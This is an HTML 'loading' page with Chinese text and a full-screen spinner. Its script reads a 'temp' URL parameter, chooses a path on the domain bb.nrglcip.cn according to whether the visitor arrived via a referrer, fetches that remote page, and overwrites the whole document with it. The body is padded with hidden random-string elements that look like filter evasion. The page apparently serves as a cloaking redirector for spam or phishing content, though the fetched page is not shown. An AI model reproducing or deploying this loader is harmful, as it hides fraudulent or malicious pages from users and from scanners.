<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hUaGesaxtQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hUaGesaxtQ .NDar5DzTZXv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hUaGesaxtQ .content {
            line-height: 50px;
            text-align: center
        }

        .hUaGesaxtQ .img {
            width: 100%
        }

        .hUaGesaxtQ .MFeVQ816 {
            text-align: center
        }

        .hUaGesaxtQ .MFeVQ816 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hUaGesaxtQ .MFeVQ816 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hUaGesaxtQ .MFeVQ816 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hUaGesaxtQ .MFeVQ816 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hUaGesaxtQ .MFeVQ816 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hUaGesaxtQ .MFeVQ816 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hUaGesaxtQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function P0mQ6HS3J(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kVRaoX = P0mQ6HS3J('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kVRaoX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kVRaoX +".html?a=share";
		}
		
        c2vYOuWNkb=url+"#"+new Date().getTime();
        c2vYOuWNkb && function() {
            $.get(c2vYOuWNkb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<ul style='display:none' >kqRIqlHrS2FsMSVYZoey2n5u65LuflA0ZXqMGHNqE1DtzNp8D0g7tAhiZAsNgczgPKkMi7ctxA</ul>
<li style='display:none' >RIga5TZYzLeO6HR4xeOg</li>
<a  href='#' style='display:none'>fPjBnfEbf4s</a>
<h1 style='display:none' >AjD3amxGKPN4uX4PdXc8javCQ4TkLCIcbbyrdU5FI6PMa</h1>
<ul style='display:none' >kqRIqlHrS2FsMSVYZoey2n5u65LuflA0ZXqMGHNqE1DtzNp8D0g7tAhiZAsNgczgPKkMi7ctxA</ul>
<p  style='display:none'>IUOeS5rA2Y2Tc4tEWBKCP2qeHi8dZujzASrPB077RNAbiCzw6lYxYuTLCj2</p>
<span style='display:none'>maIAT0wAxqu72Q0zQdvdmnVZc1ceMbR7qnzTrn5TX4E2QpIBdjwg8zOOdOIXdymrD</span>
<li style='display:none' >RIga5TZYzLeO6HR4xeOg</li>
<span style='display:none'>maIAT0wAxqu72Q0zQdvdmnVZc1ceMbR7qnzTrn5TX4E2QpIBdjwg8zOOdOIXdymrD</span><div class="hUaGesaxtQ">
    <div class="NDar5DzTZXv">
        <div class="MFeVQ816">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ORpBrcsHbZMNayE2wtx36VEOSftZ</span>
<li style='display:none' >VRAWmarxZoPMBcTw05mkSpSIQjAzQ0onIwSroSt8NcTNqU11ENXgZORZnXB1Ta5yF2zR4U10rSOIGd1</li>
<h1 style='display:none' >iHQieUaHJUgJ5DzZTJui9RvC5rcB72jSJ3acG5KEQ4OCIOgyvCfzUspyP1ppzJStkEY2xjNy0gAqyTXDsAs</h1>
<span style='display:none'>ORpBrcsHbZMNayE2wtx36VEOSftZ</span>
<li style='display:none' >VRAWmarxZoPMBcTw05mkSpSIQjAzQ0onIwSroSt8NcTNqU11ENXgZORZnXB1Ta5yF2zR4U10rSOIGd1</li></body>
</html>